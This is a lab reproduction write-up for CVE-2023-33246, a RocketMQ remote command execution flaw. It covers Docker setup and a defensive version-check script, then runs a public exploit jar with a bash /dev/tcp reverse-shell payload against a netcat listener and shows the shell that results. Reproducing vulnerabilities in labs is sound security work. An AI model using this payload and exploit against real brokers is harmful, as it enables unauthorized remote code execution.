CVE-2023-33246 Reproduction

Apache RocketMQ Remote Command Execution Vulnerability

Affected versions: Apache RocketMQ <= 5.1.0, Apache RocketMQ <= 4.9.5

Lab setup

  • Install the lab environment
    docker pull apache/rocketmq:4.9.1
    docker pull apacherocketmq/rocketmq-console:2.0.0
  • Start namesrv
    docker run -dit -p 9876:9876 -p 10909:10909 --name mqsrv -e "MAX_POSSIBLE_HEAP=100000000" apache/rocketmq:4.9.1 sh mqnamesrv /bin/bash
  • Start the broker
    docker run -dit -p 10908:10908 -p 10911:10911 --name mqbroker --restart=always --link mqsrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -e "MAX_POSSIBLE_HEAP=200000000" apache/rocketmq:4.9.1 sh mqbroker -c /home/rocketmq/rocketmq-4.9.1/conf/broker.conf
  • Start the console
    docker run -dit --name mqconsole -p 8080:8080 -e "JAVA_OPTS=-Drocketmq.config.namesrvAddr=mqsrv:9876 -Drocketmq.config.isVIPChannel=false" apacherocketmq/rocketmq-console:2.0.0

Open 127.0.0.1:8080 in a browser to confirm the console is up.
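With the lab running, a defender can confirm which version the broker actually reports and compare it with the affected ranges stated above. The following is an added example, not code from the original post, the linked tool or the RocketMQ project: it assumes the public remoting frame layout (length-prefixed JSON header plus body), that the read-only GET_BROKER_RUNTIME_INFO request (code 28, the one mqadmin brokerStatus uses) answers with a KVTable containing brokerVersionDesc, and that the broker listens on 10911 as in the docker command above.

```python
import json
import socket
import struct

# Assumed wire format: [4-byte total length][4-byte header length, top byte = serialize
# type, 0 = JSON][JSON header][optional body]; total length counts from the second field.
GET_BROKER_RUNTIME_INFO = 28  # read-only request code (assumed from RocketMQ sources)

def encode_frame(code: int, ext_fields=None, opaque: int = 1, body: bytes = b"") -> bytes:
    header = {"code": code, "language": "JAVA", "version": 0, "opaque": opaque,
              "flag": 0, "remark": "", "extFields": ext_fields or {}}
    hdr = json.dumps(header).encode()
    return struct.pack(">ii", 4 + len(hdr) + len(body), len(hdr)) + hdr + body

def decode_frame(frame: bytes):
    """Split a frame into (json header, raw body); only JSON serialization is handled."""
    total, hdr_field = struct.unpack(">ii", frame[:8])
    if hdr_field >> 24 != 0:
        raise ValueError("unsupported serialize type (expected JSON)")
    hdr_len = hdr_field & 0xFFFFFF
    return json.loads(frame[8:8 + hdr_len]), frame[8 + hdr_len:4 + total]

def is_affected(version_desc: str) -> bool:
    """Apply the stated ranges (<= 4.9.5, <= 5.1.0) to a value such as 'V4_9_1' or '5.1.0'."""
    nums = [int(p) for p in version_desc.lstrip("Vv").replace("_", ".").split(".")[:3]]
    ver = tuple(nums + [0] * (3 - len(nums)))
    return ver <= (5, 1, 0) if ver[0] >= 5 else ver <= (4, 9, 5)

def query_broker_version(host: str, port: int = 10911, timeout: float = 5.0) -> str:
    """Send GET_BROKER_RUNTIME_INFO and return the brokerVersionDesc the broker reports."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(encode_frame(GET_BROKER_RUNTIME_INFO))
        raw = sock.recv(4)
        total = struct.unpack(">i", raw)[0]
        while len(raw) < 4 + total:  # keep reading until the whole frame has arrived
            chunk = sock.recv(4 + total - len(raw))
            if not chunk:
                raise ConnectionError("broker closed the connection early")
            raw += chunk
    header, body = decode_frame(raw)
    if header.get("code") != 0:
        raise RuntimeError(f"broker returned code {header.get('code')}: {header.get('remark')}")
    return json.loads(body)["table"]["brokerVersionDesc"]  # KVTable serialized as JSON

if __name__ == "__main__":
    desc = query_broker_version("127.0.0.1")  # the broker the lab above exposes
    print(desc, "AFFECTED" if is_affected(desc) else "outside the stated affected range")
```

Against the 4.9.1 lab broker this should report V4_9_1 as affected; a broker with ACL enabled may answer with a non-zero code, which the script surfaces rather than guessing.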

EXP reproduction

https://github.com/SuperZero/CVE-2023-33246

First start a listener on the port:

nc -lvnp 1122

Run the EXP to obtain a reverse shell:

java -jar CVE-2023-33246.jar -ip "127.0.0.1" -cmd "bash -i >& /dev/tcp/127.0.0.1/1122 0>&1"
RocketMQLog:WARN No appenders could be found for logger (io.netty.util.internal.InternalThreadLocalMap).
RocketMQLog:WARN Please initialize the logger system properly.
15:24:38.364 [NettyClientSelector_1] INFO RocketmqRemoting - closeChannel: close the connection to remote address[127.0.0.1:9876] result: true
15:24:38.454 [NettyClientSelector_1] INFO RocketmqRemoting - closeChannel: close the connection to remote address[127.0.0.1:10911] result: true
攻击已结束!请稍后查看结果!

A shell comes back on the listener, so the attack succeeded:

sh-4.2$ nc -lvnp 1122
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::1122
Ncat: Listening on 0.0.0.0:1122
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:50388.
[rocketmq@fe61c04bb353 bin]$ ls
ls
README.md
cachedog.sh
cleancache.sh
cleancache.v1.sh
dledger
mqadmin
mqadmin.cmd
mqbroker
mqbroker.cmd
mqbroker.numanode0
mqbroker.numanode1
mqbroker.numanode2
mqbroker.numanode3
mqnamesrv
mqnamesrv.cmd
mqshutdown
mqshutdown.cmd
os.sh
play.cmd
play.sh
runbroker.cmd
runbroker.sh
runserver.cmd
runserver.sh
setcache.sh
startfsrv.sh
tools.cmd
tools.sh
[rocketmq@fe61c04bb353 bin]$